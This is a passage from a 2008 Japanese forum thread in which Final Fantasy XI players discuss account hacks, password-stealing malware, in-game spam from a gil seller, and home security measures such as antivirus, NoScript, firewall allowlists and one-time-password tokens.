ウィルス感染予防は99%のユーザー努力と1%のスクエニの対策 くらいに思って、みんながんばって(ほんとか?)
138 :
既にその名前は使われています :2008/09/09(火) 04:45:43 ID:TnhxmMtL
先読みのうまいスクエニのことだからこのままの状況が続くようなら
139 :
既にその名前は使われています :2008/09/09(火) 05:03:56 ID:0bKpFSr2
先読みがうまいんじゃなくて先読みが下手すぎ<スクエニ
140 :
既にその名前は使われています :2008/09/09(火) 05:06:30 ID:e0e1ARsf
■e<その評価は想定外
141 :
既にその名前は使われています :2008/09/09(火) 05:10:13 ID:0bKpFSr2
想定外じゃなくて、評定外よ>スクエニ
142 :
既にその名前は使われています :2008/09/09(火) 06:26:25 ID:fdQyCNxB
143 :
既にその名前は使われています :2008/09/09(火) 07:38:20 ID:sWekap9H
おはようのあげ。
144 :
既にその名前は使われています :2008/09/09(火) 08:44:15 ID:Yiz1wqrO
あげげ
146 :
既にその名前は使われています :2008/09/09(火) 10:47:15 ID:Yiz1wqrO
沈んでいるのでage
147 :
既にその名前は使われています :2008/09/09(火) 11:14:37 ID:Le83eebv
>>29 と
>>145 のはニコのIDから察するに同じ人みたいだ。
感染したワームは 物理ドライブや リムーバルドライブ経由で自己増殖するやつで
(オートラン系のあれ) しかもドロッパ不明ラシイヨ。
トレンドマイクロみてきたがプロセス殺して レジストリ相当いぢらないと駆除できないから
この人の学校とか友人のPCとか軒並み感染してるのかも。
そしてそこからまた無限増殖以下ループ。
見えないからぺけれあよりオソロシスかもだな。
>>145 1回ドロッパ入ると、ウィルス169種類も呼び込むのかw すげえw
その上検知できてない奴もまだありそうだ。
149 :
既にその名前は使われています :2008/09/09(火) 13:01:26 ID:2VmfVh1w
業者追放スレで太公望買った奴がふるぼっこワロスw
>>147 ,148
破壊活動の一環として、レジストリエディタの起動も阻害されるみたいだから、まずそこから修復する必要があるのが手間ぽい。
それと、見知らぬファイルの存在に気付いて、オンラインスキャンを掛けた段階で発覚した様だから、セキュリティソフトを
常用している訳ではないのがまた問題。
以前から、また別のマルウェアを飼っていた可能性もあり得るな。
ttp://mainichi.jp/life/electronics/news/20080905mog00m100029000c.html この記事でも、
>「(ウイルス対策をしない)『永遠のビギナー』がだまされて連れて行かれる悪性ウェブサイトの情報の共有が必要だ」
と〆られているように、パソコンを使い始める段階からの啓蒙が必要な時代だと痛感。
以前のMSNバンドルではないけど、PCメーカーも特定のセキュリティソフトだけでなく、初期設定で導入するソフトを選べるような
バンドル形態にでも移行してくれないものかね……
151 :
既にその名前は使われています :2008/09/09(火) 14:15:12 ID:bnQp6Lrv
今日は落ちるのはやいなあ
152 :
既にその名前は使われています :2008/09/09(火) 14:22:41 ID:O9Q5jCQj
153 :
既にその名前は使われています :2008/09/09(火) 14:25:55 ID:Le83eebv
//www.excite-blog●com/ってさー リネとかFFのパスぬくとろりんのダウンローダだよね?
ニコニコへの送信を書き換えてるのか ログインして書き換えてるのかは不明か。
まー ニコの垢ぬいたとこでうれるもんないしな・・
>>13 がはってくれてるキャッシュは /keyword なんだけど
ブログでかいてあるほうのも キャッシュあってさー
そっちは .rarまで ばっちりはいってる(た)のさ。
つべのアドレスだから ちゃんと読めば怪しいのはすぐわかるんだけど・・・
まだ 駆除してないみたいだし回線抜いてクリーンインストールしてほしい。
www.excite-blog●comのスパムコメントも 7月くらいまではこぴぺばっかだったのが
8月はいって バラエティ出てきたのもこのトロイのせいかもわからんね。
気づいてない感染者が botになってるみたいなさー。
154 :
既にその名前は使われています :2008/09/09(火) 15:21:19 ID:pQnuC6Df
ハックされてたぜいやっほーーーーう!! ただ今まで何個か報告見てたけど、なんか俺のは変だった 報告やうわさ、フレの体験談では素っ裸で金になるアイテムは全部売られてたんだよな でもなぜか俺の場合、高価な武器防具だけがなくなってた・・・ ほかのクリやら、ちょっとした装備やら、アイテムは無傷。 最近の業者は速度重視なんだろうか
155 :
既にその名前は使われています :2008/09/09(火) 16:09:14 ID:FAEJQdbw
ソーシャルハックじゃないか? 知り合いとかにIDパスを教えてたりしない?
タル♀専用裏LSスレの 怒ったかーちゃんに高額装備を無料配布されてしまう浮気親父を思い出した
157 :
既にその名前は使われています :2008/09/09(火) 16:34:32 ID:IwqkXjbN
>>155 いや、誰にも教えてない!
でもさっき巻き戻し報告スレ見た限りでは
俺みたいに微妙に残ってたり、高額装備以外が残ってる人もいるっぽい!
158 :
既にその名前は使われています :2008/09/09(火) 16:51:44 ID:Nr9l22bb
>>154 俺もそんなもんだよ
数十万以上の装備とギルだけで
白門競売に放置
159 :
既にその名前は使われています :2008/09/09(火) 17:25:22 ID:XfUUNBwW
160 :
既にその名前は使われています :2008/09/09(火) 17:52:32 ID:CYHnh1am
カスペルスキーオンラインスキャンやってみたんですが、 数種類ある内の、マイコンピュータだけですべて調べれるんでしょうか? マイコンピュータとハードディスクの2つやると調べ終わった。と言えるんでしょうか?
161 :
既にその名前は使われています :2008/09/09(火) 18:49:19 ID:8iW9oQWs
age
162 :
既にその名前は使われています :2008/09/09(火) 19:37:34 ID:by8t1Q8S
163 :
既にその名前は使われています :2008/09/09(火) 20:22:32 ID:ENRTMYLf
age
164 :
既にその名前は使われています :2008/09/09(火) 20:36:49 ID:BFQDYRtV
>>160 マイコンピュータ選択で「ロック部分」以外はスキャンされます
ただし、Windowsが動いてることが条件のオンラインスキャンでは
PCの中を確実に100%スキャンできないことをわかっていてくださいね
165 :
既にその名前は使われています :2008/09/09(火) 20:38:04 ID:OruOYCjf
製品版だとWindowsが動いてないときでもスキャンできんの・・・?
セーフモードって知ってます?
167 :
既にその名前は使われています :2008/09/09(火) 20:46:31 ID:SHBsJIxf
ニコニコの相当酷いな Flashの脆弱性使われたんじゃないだろうしなあ
垢ハックされてやっと復旧できたんだけど とりあえず、spybot入れて垢ハックされたノートン止めてカスペ入れたんだけど あとは、ブラウザも変えたほうがいい? とりあえずIE以外なら何でもいいのかな。
169 :
既にその名前は使われています :2008/09/09(火) 20:56:00 ID:BFQDYRtV
>>168 SpybotのTeaTimerは監視が甘いですから、あまり信用されませんように
ブラウザはスクリプトさえ不許可にしていればIEでもほかのでも大丈夫です
170 :
既にその名前は使われています :2008/09/09(火) 20:57:43 ID:SHBsJIxf
火狐+Noscript+PG2その他最新うpdateで まあ盲信はしない程度にだけど安心出来るんじゃないの このレスの一秒先は知らない
171 :
既にその名前は使われています :2008/09/09(火) 20:58:39 ID:fdQyCNxB
まずクリーンインストールしました?
172 :
既にその名前は使われています :2008/09/09(火) 21:00:37 ID:BFQDYRtV
安心できる環境なら仮想を入れる以外にないと思いますね
わたしは入れてませんけど
そもそも感染したのをセキュリティソフトのせいにしている段階で
次の感染が目に見えてますよ
>>168
173 :
既にその名前は使われています :2008/09/09(火) 21:05:53 ID:TnhxmMtL
>>168 ノートンがありながらカスペを選んだ時点で暗い未来が見えた。
174 :
既にその名前は使われています :2008/09/09(火) 21:06:21 ID:BFQDYRtV
>>168 のためを思ってもっと突っ込んでおこう
カスペルスキーをデフォルトのままで使ってるならノートンを100%使いこなせてる以下ですから
ちゃんとカスペルスキーの設定も勉強してくださいね?
175 :
168 :2008/09/09(火) 21:20:48 ID:yDDu/hK4
クリーンインストールは、しました。 ノートンを使いこなせてないってのは、そのとおりかも 余り内容が分からず手動で検査してたぐらいだから とりあえず、カスペの勉強してきます。
176 :
既にその名前は使われています :2008/09/09(火) 22:01:49 ID:knuGnjo1
ほしゅ
177 :
既にその名前は使われています :2008/09/09(火) 23:08:01 ID:BFQDYRtV
201からあげ
178 :
既にその名前は使われています :2008/09/09(火) 23:57:39 ID:ENRTMYLf
age
179 :
既にその名前は使われています :2008/09/10(水) 00:30:35 ID:wvnIATMK
ほ
180 :
既にその名前は使われています :2008/09/10(水) 00:35:38 ID:haPOrOHr
polいたら知らない外人からRMTの宣伝みたいなメッセきたんだけどなんだろう? PS2とXBOXでしかしてないんだけど大丈夫なのかな?
181 :
既にその名前は使われています :2008/09/10(水) 00:54:22 ID:hmKtyL7L
>>180 フレンドサーチあたりからランダムに狙ってんのかな
とりあえず相手しなきゃ無問題かと
182 :
既にその名前は使われています :2008/09/10(水) 01:14:35 ID:uS1azy5p
ニコニコがどうのこうの話題にでてるけど、 ハクられた赤が罠URLを張ってるだけ? それとも改竄されてスクリプトが埋め込まれた?
>>182 スレをする限りでは、うp主のコメにURLが貼り付けてある
って感じのようだが
改ざんなんてされてたら、ほとんどの香具師がアウトになるな
もちろん俺もw
184 :
既にその名前は使われています :2008/09/10(水) 01:36:24 ID:i+0PiHSG
すまん さげてた
185 :
既にその名前は使われています :2008/09/10(水) 01:38:01 ID:uS1azy5p
ですよねー 俺もニコはscript許可してるんで改竄されたらおわりだw
186 :
既にその名前は使われています :2008/09/10(水) 01:58:12 ID:ZH77lAf2
報告を見る限りでは、妙なURLをコピペして接続しなきゃ大丈夫なんじゃないです? まぁ、ニコ動は見たことがないからよくわからないですけど
>>185 それってニコニコ見る時だけ手動で許可してるんですか?
188 :
既にその名前は使われています :2008/09/10(水) 02:24:58 ID:ZH77lAf2
>>187 スクリプトの許可・不許可はどのブラウザでも手動で切り換える以外に
方法はありません
MSの月例パッチきてるー
>>168 デスクトップPCなら、
リムーバブルケースとHDDをもう一台買って
ゲーム用のHDDとそれ以外と分けるのも1つの方法かと。
(今なら両方で1万ぐらいでしょう)
同じPCなのでアクティベートも問題なく通ります。
ゲーム用のHDDではゲームしかしない。
少し面倒ですが。
191 :
既にその名前は使われています :2008/09/10(水) 05:09:36 ID:MyZKqgel
218からあげ
192 :
既にその名前は使われています :2008/09/10(水) 05:44:49 ID:CMImgkEn
193 :
既にその名前は使われています :2008/09/10(水) 06:00:02 ID:9R0YN0YX
194 :
既にその名前は使われています :2008/09/10(水) 06:44:31 ID:ZulBeyJw
マジで死なねーかな犯罪業者、釣り業者とかのがよっぽどかわいいわ
195 :
既にその名前は使われています :2008/09/10(水) 06:48:04 ID:Jhy/Kxuz
>>194 ぶっちゃけ、両方とも同一業者なんですけどね
janestyleもs11●XREA●comだったわ あぶないのか 先日から2.77から2.83にものすごいいきおいでバージョンアップしたが
197 :
既にその名前は使われています :2008/09/10(水) 09:29:29 ID:yft6myK3
保守
>>187 FirefoxのNoScriptを使えば、「nicovideo.jpのスクリプトだけを許可」とか
「google.co.jpだけを許可」とかできるよ。
199 :
既にその名前は使われています :2008/09/10(水) 09:36:46 ID:3rrxHyXh
ニコニコ百科事典にクロスリンクスクリプト?とかいうのが埋め込まれてたらしい flash系の不具合じゃないな
200 :
既にその名前は使われています :2008/09/10(水) 10:25:02 ID:jkxoHptp BE:246758933-2BP(560)
>>180 俺も今日きてた、ちなみにPC
フレになってないのにメッセージって送れる物なんだっけ?
なんか不気味だな
サイトの宣伝みたいなのも書いてあった
Hugecheap.comとかいうところ
怖いのでサイトは見てないw
201 :
既にその名前は使われています :2008/09/10(水) 11:43:37 ID:yatTf4Zz
Windowsうpだーてage
203 :
既にその名前は使われています :2008/09/10(水) 13:17:41 ID:yatTf4Zz
204 :
既にその名前は使われています :2008/09/10(水) 15:14:17 ID:5g01Eykn
浮上
>>200 俺もきてたw同じところから
時間がなくてGM呼べなかったから、こんなもん着てるぞゴラァってSTTにメールしといた
206 :
既にその名前は使われています :2008/09/10(水) 15:37:25 ID:Pba1R0dy
最近このスレでちらほら言われてるリムーバブルケースとHDDを買って ゲーム用のHDDに〜ってのよく見るんだけど、 外付けHDDにインスコするのとはまた別なんでしょうか?
207 :
既にその名前は使われています :2008/09/10(水) 15:38:49 ID:5bleATyV
ゲーム内でまでSPAMとか必死にも程が有るわwww BANはやくきて〜はやくきて〜
208 :
既にその名前は使われています :2008/09/10(水) 16:00:42 ID:UAjbBo97
209 :
既にその名前は使われています :2008/09/10(水) 16:11:24 ID:UAjbBo97
ちと不親切だったか スレで安全対策として出てくるリムーバブル云々は 「内蔵HDDを簡単に交換できるパーツを買ってきて ゲームとそれ以外で別々の内蔵HDDを使う」って話 外付けHDDには基本的にWindowsをインストールできないし 両方の環境で同じ内蔵HDDが使えるならセキュリティ上も意味なし
210 :
既にその名前は使われています :2008/09/10(水) 16:14:29 ID:9SwW06UW
あれビスタでPG2って動かないのか? 履歴が表示されないんだが
211 :
既にその名前は使われています :2008/09/10(水) 16:17:24 ID:Pba1R0dy
>>209 なるほどw やっぱそんなに簡単な事じゃなかったかw
わざわざご丁寧にありがとうございますm(_ _)m
そーいえば、最近ニコ動も騒がれてるけど、火狐3+Noscriptで動画見るためにnicovideo.jpを許可すると上のネトゲの広告とか、
アマゾンの市場も許可してしまうんだよな、、、動画だけを見るようにすることはできないのかな
212 :
既にその名前は使われています :2008/09/10(水) 16:21:07 ID:uS1azy5p
213 :
既にその名前は使われています :2008/09/10(水) 16:22:19 ID:uS1azy5p
というかあのネトゲの広告とかいつかヤバイことになりそうだよなw アマゾンはときどきPG2三国リストで弾く鯖読みに行ってるし
>>211 一時的にでよければ
動画が表示されるべきエリア(領域)にカーソルを持っていって、
右クリックするとそこのリンクだけを許可(または一時的に許可)という指定もできるよ。
216 :
既にその名前は使われています :2008/09/10(水) 16:50:13 ID:Pba1R0dy
いちよう、今色々イジってみた所、nicovideo.jpは許可して 広告とアマゾン市場(ecx.images-amazon.com、広告の方は失念)の広告の画像の右クリNoscript のオプションで画像を読み込まないって設定したら、広告は消えて、アマゾンの方も市場は出てるけど 画像は全く表示されない状態になりました。 いちよこれでもOKなのかな
217 :
既にその名前は使われています :2008/09/10(水) 16:52:32 ID:5bleATyV
動画だけ見てえんだよ!って話ならCraving Explorerとか使った方が良いんじゃないかなーと思う コメントしつつ見たいなら仕方無いか
一応、報告しとくな。 今日の深夜にRMT業者からメッセージが届いたんだけど、おまいらどうよ? 件名:Hugecheap.com FFXI Gil Full stock now 本文省略 ちなみに、この業者のページを踏んだことはない。 俺自身は気楽にプレイしているだけだけど、垢ハックとかは勘弁してほしいし、大丈夫かな…不安だ。
220 :
既にその名前は使われています :2008/09/10(水) 17:14:29 ID:it84yHHV
221 :
既にその名前は使われています :2008/09/10(水) 17:15:27 ID:yatTf4Zz
222 :
既にその名前は使われています :2008/09/10(水) 17:16:58 ID:hmKtyL7L
10月でライセンス切れるからカスペに乗り換えるかなー
223 :
219 :2008/09/10(水) 17:17:05 ID:vENvMGvG
うわ、、、他にもいたじゃん。俺の馬鹿 スレ汚しすまそ
224 :
既にその名前は使われています :2008/09/10(水) 17:17:38 ID:PkKLWs49
>>219 POLのメッセージでしょ
うちにもきた
ところで、フレに聞いた話では 外ではアクセスしない、セキュリティは気にしてる (少なくともOS乗っ取られレベルはないはず)ということなので、 1)保存していたログインパスワードファイルがトロイの木馬などで送信された 2)デフォルトのパスワードのままだったからそれが解析された。 3)メモリを直接よまれた? 4)実は◆eの内部流出 が原因だと仮定した場合、1に関しては「パスワードを保存しない。」と いう事は有効なんだろうか。 そのとき、キーボードで入力するより、ソフトキーボードの方が安全だと思うんだG、 入力が面倒。 複雑なキーもマウス操作を記憶してボタン一発でパスワードを入力できる ソフトって必要?他にも安全対策関連のアイディアがあるなら、 プログラム作ってみようと思うんだが。
226 :
既にその名前は使われています :2008/09/10(水) 17:31:52 ID:hGJGqFoz
POLのFAQ探してきた。 Q11583 Q:メッセージは誰にでも送れるのでしょうか? A:プレイオンラインに登録されている『ハンドル』すべてに対してメッセージを送れます。 ただし『フレンド登録』をしていない相手には『友達になろうよ!』メッセージのみ送れます。 Q11585 Q: 『友達になろうよ!』メッセージに登録していない相手から『メッセージ』が届くのですが、 なぜですか? A:通常の『メッセージ』は『フレンド登録』した者同士で送受信できます。 相手からの「友達になろうよ!」メッセージに「登録する」にした場合は、 その相手が自分のフレンドとして登録されます。 もし、登録した覚えのない相手から『メッセージ』が届いた場合は、 『フレンド登録』しているフレンドが別の『ハンドルネーム』で『メッセージ』を送信してきたか、 またはあなたが『プレイオンライン・チャット』中に、 チャットメンバーがメッセージを送信してきたことが考えられます POLのシステムを不正利用してるか フレンド登録してる誰かがはくられたんじゃないかね。
>>225 > 外ではアクセスしない
これどういうこと?外ってどこ・・・?
>1に関しては「パスワードを保存しない。」という事は有効なんだろうか。
保存するのとどっちがいいか微妙。
保存してるのを持っていく場合もあれば、入力する時に持っていかれることもある。
どっちにしても(今まで使われた)メモリ参照のウィルスならいっしょだけど。
> プログラム作ってみようと思うんだが。
何したってPOLを使う時点で無駄じゃない?
あえていえばHIPS作るとかかね。
228 :
既にその名前は使われています :2008/09/10(水) 17:33:04 ID:wTUCoorm
>>225 今回話題のウィルスは、POLがパスを送信するときにパスを抜いていくものですよ?
そういうことじゃないのかな?
余計なツールは作らんほうがいい
>>227 たとえばネットカフェからFFをしない、ってことでは?
231 :
既にその名前は使われています :2008/09/10(水) 17:37:17 ID:wTUCoorm
>>225 は今回のアカウントハックとは別のなにかを言おうとしているの?
>>228 じゃあどうにでも対策できるものじゃんヽ(`Д´)ノ■e
つまりそのパスワードを特定のIPアドレス外には送れないようにすればいいわけかな?
>>230 なるほど。
でも、デフォルトのパスワードって何だ?
あんまり真面目に読んじゃだめな文章なのかなw
ツール作りたいなら勝手にしていいけど配布はするなよ。
そのフレに渡すだけにしとけ。 んでアカハックされらた多分犯人は
>>225
234 :
既にその名前は使われています :2008/09/10(水) 17:45:34 ID:wTUCoorm
>>232 ですね
そのためにPOLのファイアウォール設定が出してあります
235 :
既にその名前は使われています :2008/09/10(水) 17:47:26 ID:wTUCoorm
>>232 どうにでも対策できるものじゃん
・特定のIPアドレスってどこだと思ってる?w
・この間見つかった奴は独自プロトコルover httpsで設計されてたのにどうやって
「パスワード」を送信していると判断するつもり?w
>>234 POLプロセスで送信するわけじゃない。injectionを使ってIEでもノートパッドでも
エクスプローラーでもどのプロセスから送るか分からない。
238 :
既にその名前は使われています :2008/09/10(水) 18:14:38 ID:HDqreeXy
239 :
既にその名前は使われています :2008/09/10(水) 18:15:54 ID:5bleATyV
241 :
既にその名前は使われています :2008/09/10(水) 18:28:15 ID:5bleATyV
242 :
既にその名前は使われています :2008/09/10(水) 18:28:41 ID:qq0yJ2Em
>>240 週末プレイヤーとかは泣きそうだな。
でも今の巻き戻し一回だけ、の現状ではお間抜けさんにとっては最後の砦になるんじゃないか?
若しくはコレを盾に、対応しない代わりに巻き戻し回数増やさせるとかさ。
EQ2のメンター制を取り入れるぐらい柔軟性が出てきたし要望出しまくればやってくれるカモよ?
243 :
既にその名前は使われています :2008/09/10(水) 18:31:16 ID:0qqdueuQ
なんかPOLでfgrfgrとかいうガルカからメッセが来てたんだが・・・ 業者うぜぇぇぇ
つーか、WoWでやってるトークンを利用したワンタイムパスワードをFF11でも 入れるって話になってるよな。それさっさとやってくれれば、パスワード盗難は ほぼありえなくなる。 物理的に家に泥棒が入ってトークンを盗まれる可能性は残るが。
245 :
既にその名前は使われています :2008/09/10(水) 18:36:20 ID:AtjPKwBT
何で俺にはメッセージこないんだ?
246 :
既にその名前は使われています :2008/09/10(水) 18:40:07 ID:F2ytF2Ov
>240 完美は1年半前に正式サービス開始と同時にそれ導入してたよ アイテム課金で1個100円 ま、完美は運営の鯖がハックされて意味なかったけどねw
247 :
既にその名前は使われています :2008/09/10(水) 19:22:20 ID:20xbD6x5
>>246 ついでに、完美の運営鯖ハック祭りのあと
そのアイテムは10円相当に引き下げられた
248 :
既にその名前は使われています :2008/09/10(水) 19:37:50 ID:qq0yJ2Em
249 :
既にその名前は使われています :2008/09/10(水) 19:40:39 ID:wTUCoorm
テンプレ改定 ■POL用ファイアーウォールの設定(アプリケーションルールでpol.exeの設定) ※これはpol.exeのプロセスの一部に同化してアカウント情報を送信するマルウェアにしか効果がありません。 ※下記設定(記述の仕方)はお使いのソフトによって異なりますので、それぞれのソフトのFQAをご自身でご確認ください。 許可しているリモートIPの範囲 61.195.48.0-61.195.55.255 (61.195.48.0/21) 61.195.56.0-61.195.59.255 (61.195.56.0/22) 61.195.60.0-61.195.63.255 (61.195.60.0/22) 202.67.48.0-202.67.63.255 (202.67.48.0/20) 219.117.144.0-219.117.159.255 (219.117.144.0/20) ※「61」で始まるIPは「61.195.48.0-61.195.63.255(61.195.48.0/20)」でくくってしまっても○ ※FWによっては()内のIPアドレス範囲の設定の仕方を指定できるようなので、その場合()内の数値を使用すると 設定が簡単になります。 空けているローカルポート TCP1024-65535 UDP50000-65535 空けているリモートポート TCP25,80,110,443 ,50000-65535 UDP50000-65535 ※契約プロバイダによってはローカルポート UDP53番が必要になるようです(プロバイダに確認してください) ※injectionを使ってIEでもノートパッドでもエクスプローラーでもどのプロセスから送るか分からない ウィルスがいるため、POLをファイアウォール設定しても無意味になる可能性が高い。
250 :
既にその名前は使われています :2008/09/10(水) 19:50:11 ID:DjGGVVPw
ノートンは、期限1ヶ月前になると毎日、契約の更新をしてくれって、 メッセイジを出すんだが、高確率でその時にPOLが落ちる。凄い嫌がらせで、 ストレスがマッハになる。ちなみにWin上から削除しても、バージョンアップの情報を Net 上に 取りに行きます。まあ、安いソフトに買い換えました。 ハックされたら、引退しますし・・・・ ^^
251 :
既にその名前は使われています :2008/09/10(水) 20:33:38 ID:xo3YcmtF
>>250 ハクられたら、オンラインゲーム(ジャンルを問わず)
を引退が精神衛生上一番いい。
252 :
既にその名前は使われています :2008/09/10(水) 20:34:47 ID:TBgNt/oA
>>240 は面白いな。
POL上から即ロック可能で、一週間は自分からもロック解除出来ないとかだと、
中華は気が狂ってお得意さんから殺されるだろうてwwwww
一般人なら一週間FF出来なくても何の問題もないし。
着替えとか文句言う廃人はこれを機会にゲーム止められればいいし〜
253 :
既にその名前は使われています :2008/09/10(水) 20:37:06 ID:rGm3tcoK
引退とか言ってるのは巻き戻し恐れてる業者か? 盗品売るとかホント糞だな
そんなことよりウイルスバスター2009にしたら、IEにもFxにも変なツールバーが追加されたんだが?
カスペこのまま発売か・・・
256 :
既にその名前は使われています :2008/09/10(水) 21:08:50 ID:OMV7ATPV
>>180 なんかPOLで見えるオンラインフレリストにそのメアドがはいってしまった。
他と違って黒字で出てきてるんだけど…どうなんだこれ?
いまのところウイルスチェックにはかかってこんけど気になるな。
257 :
既にその名前は使われています :2008/09/10(水) 21:14:42 ID:kkQM2u8o
たった今フレから
>>219 と同様のメッセが知らないやつからきたんだけどって相談があった
書かれているアドレスはwww●hugecheap●com
>>245 俺も前は来なかったんだけど、最近大きな買い物を競売でやったせいかも。
259 :
既にその名前は使われています :2008/09/10(水) 21:32:45 ID:K0KYS+0c
これからのネトゲはRMTに加えてハッキング問題が出てくるなw
260 :
既にその名前は使われています :2008/09/10(水) 21:56:22 ID:wTUCoorm
IPアドレス 208●69.176.44 ホスト名 hugecheap●com IPアドレス割当国 アメリカ合衆国 ( us ) Simpli Hosting, Inc SIMPLI-1 208●69.176.0 - 208●69.183.255 China Clastar VLAN-29 208●69.176.40 - 208●69.176.47
クレジットカードの不正使用による損害に対し、年間 100万円を限度に補償が
262 :
既にその名前は使われています :2008/09/10(水) 23:09:37 ID:CYFgzgAe
ほ
263 :
既にその名前は使われています :2008/09/10(水) 23:54:48 ID:uBRXjTEd
ほしゅ
264 :
既にその名前は使われています :2008/09/11(木) 00:26:17 ID:tcL4n8t8
265 :
既にその名前は使われています :2008/09/11(木) 00:37:15 ID:vhL2YUaz
おやすみ前のあげ
まさか自分もアカハックされるとは・・・、2日前からおかしいいなと思ってたけど
267 :
既にその名前は使われています :2008/09/11(木) 00:46:15 ID:VJ4pGtb8
268 :
232 :2008/09/11(木) 00:48:14 ID:cF7FX+mB
コンピュータ名、ユーザ名、IPアドレス、接続されたハードウェア等 アクセスしているPCを識別する情報はいくつもあるから、それらを組み合わせて記憶し、 たとえパスワードを盗まれてもアクセスできないように、 ■指定された端末以外からはアクセスを禁止する という設定ができればいいと思う。 その場合、識別情報を変更するときが問題になるが、 設定変更のためのパスワード発行依頼をするページを作り、 登録されているメールアドレスにそれが届くようにする。 パスワードじゃなくても、登録URLを記載してもいい。 インターネットのユーザー管理ではよく行われていることだよ。
↑ちょっと方向性変わったが、いかなる方法でハックされても 同じ環境を作るのが難しいものをかんがえてみた。 ちなみに、データはしっかり暗号化してくれよ>■e
●今日の0時30分 ●2ヶ月ほどインしてなくて日曜日に久々にインしただけ。ネットはアメーバブログや2ch、ニコニコ、他 ●他人が貴方のIDを使用したことが一度でもあるか No ●ID・Passの認証方法 ずっとPOLに保存/自動ログイン ●Pass変更の履歴 したことない ●他人が貴方のPCを使う可能性の有無 自分オンリー ●ツールの使用の有無: なし ●ネットカフェの利用の有無: No ●使っているOS Win XP SP2 4日前にSP3に変えた。 ●使用ブラウザ 火狐3 時々IE7 ●WindowsUpdateの有無 毎月小まめにUPしてた。 ●FlashPlayerとRealPlayerのバージョン 最新だと思う。 ●アンチウイルスソフト Avaist ●その他のSecurty対策 なし ●ウイルススキャン結果 spybotで4匹削除 ●スレログやテンプレを読んだか 日曜日読んでspybot入れた polからFF11に移行する時必ず落ちるのでおかしいと思ってた。 Vupの不具合かと思ったが念のため、HDD入れ替えてOSインストしてPOL立ち上げたらいつものIDが無効に成ってた;; 今から解約中のもう1アカで事情説明してくる
> 最新だと思う。 バージョンを確かめてみましたか?
>>270 ・Spybotで検出された4つのウィルスの名前はなんでしょうか?
・FirefoxはFirefox3ですか?
・NoScriptは入れてましたか?
>>268-269 パス盗まれるような状況ならハード等のPCを識別する情報も盗めるわけで、
そんなことをしても意味は全くない。
それよりWoWのAuthenticatorと同様なものを入れる計画があるからそれが入ればOK。
273 :
既にその名前は使われています :2008/09/11(木) 01:51:06 ID:G8I8Q8+3
>>268 普段とプロバイダが違うとアクセス不可でいいよ、もう。
274 :
272 :2008/09/11(木) 01:55:16 ID:Lh4I3yVK
嘘を言ってしまったかもしれないので自己レス > パス盗まれるような状況ならハード等のPCを識別する情報も盗めるわけで、 > そんなことをしても意味は全くない。 同じ環境を作る必要はなくて認証の際にこの情報を詐称できる、と思うけど もし詐称不可能な情報を作ることが可能なら意味はありますね。 Authenticatorの方がお手軽かつセキュリティ強度も高いけど。
275 :
既にその名前は使われています :2008/09/11(木) 01:57:48 ID:Rs7EDT7N
> 最新だと思う。 いっつもコレが引っかかってるパターンなんだよな
>>273 どのプロバイダに接続していることは簡単に認識可能だし、
中国からVPNを使ってそのプロバイダ経由でアクセスすることも簡単。
つーか中国からのアクセスを既に遮断しているのに、アカハックが
続いているってことは、現時点でSoftetherのようなVPN経由で
日本のプロバイダを通してアクセスしているはず。
マイナーなプロバイダに入ってる人は多少守られるかもしれないけど
わりと微妙な嫌がらせにしかならない。
>>271 HDD入れ替えましたので、今はバージョンの確認取れないです。
>>272 名前までは・・とにかく削除しました。
FirefoxはFirefox3です
NoScriptは入れてません、今は怖いので入れています。
GMにメールしました。不正アクセスの確認が取れたので、アカウントのログイン停止中とのこと。
明日不正アクセス専門チャットで詳しい被害聴いてきます・・
日本国内にも中国人が多数居る訳だから、 垢ハック対策で中国「から」のアクセス遮断しても無意味でしょ。
280 :
既にその名前は使われています :2008/09/11(木) 03:07:13 ID:p+N5/k40
>>279 テンプレサイトにあります
そっちを見ていただければじゅうぶん
281 :
既にその名前は使われています :2008/09/11(木) 03:20:08 ID:p+N5/k40
スクエニからニュースレターが来てた 5年FFにいて初めて来たんだけどこれ・・・ テキストでしか受け取れない仕様にしてるからどんなリンクが 張られてるのかわからないけど、大丈夫なものかどうか・・・
282 :
既にその名前は使われています :2008/09/11(木) 03:21:59 ID:Rs7EDT7N
ニュースレターは3月のBAのときとかも来てたよ
283 :
既にその名前は使われています :2008/09/11(木) 03:24:41 ID:p+N5/k40
>>282 ありがとうございますm(_ _)m
時期が時期だけに、ちょっと過敏になりすぎてる
284 :
既にその名前は使われています :2008/09/11(木) 04:25:25 ID:5xYM1Hf3
NoScriptいれてないFireFoxになんの意味が・・・
>>278 .279
遮断する意味はある
遮断すれば遮断したぶんのこうかはある
完璧ではないし、遮断することは本来普通の対応じゃないか?
>>284 色んな意味でちょっと敏感になりすぎ
大きな事故がありそうな、最近そんな気がしている。
286 :
既にその名前は使われています :2008/09/11(木) 06:31:27 ID:caW3dXW+
age
深夜数時間Vanamon繋がらなかったけどまた何か改ざんされてんだろか。
288 :
既にその名前は使われています :2008/09/11(木) 08:30:06 ID:OsiGRecJ
1年ぶりに復帰しようとしたら IDかパスが違うと言われて POLにログインできなくなってたんだけどやられたかな? 他の心当たりとしては去年行われたセキュリテイ強化の際 パスを変更せず5桁のまま放置したことです
ヴァナモンをソースチェッカーで調べてみたが、問題は無かったな 油断しないに越したことは無いが
290 :
既にその名前は使われています :2008/09/11(木) 10:35:28 ID:m4an2tNo
age
291 :
既にその名前は使われています :2008/09/11(木) 11:27:18 ID:XFMRxvvi
さがってきた
292 :
既にその名前は使われています :2008/09/11(木) 11:27:48 ID:45qtTbJq
>>288 とりあえずウイルスチェックやソフトの更新確認を
293 :
既にその名前は使われています :2008/09/11(木) 11:30:47 ID:XEqKrORb
保守ついでの質問 俺は半年間ログインしていないんだが(カード決算・自動ログイン) たとえウィルスに感染していたとしても、ログインしなきゃ抜かれることはないのだろうか?
294 :
既にその名前は使われています :2008/09/11(木) 11:35:38 ID:i61RPvcE
すでに抜かれていなければ大丈夫なんじゃない PS2か箱でログイン出来るか試してみるのが良い
295 :
既にその名前は使われています :2008/09/11(木) 11:36:14 ID:Q7izZchq
それに答えられるやつはいない
296 :
既にその名前は使われています :2008/09/11(木) 11:46:58 ID:9zOKc/RD
FFXIに限ればログイン時かログイン後に抜くのが普通だから ログインしなけりゃ抜かれる可能性は低いだろうな ・引退前に抜かれてた ・弱いパスワードを使ってた ・他のサービス(ゲーム)と同じパスワードを使ってた ・実はログインしてた 復帰したら垢ハックされてた奴は大抵このパターンのどれか
297 :
既にその名前は使われています :2008/09/11(木) 12:02:28 ID:7JlXYsuA
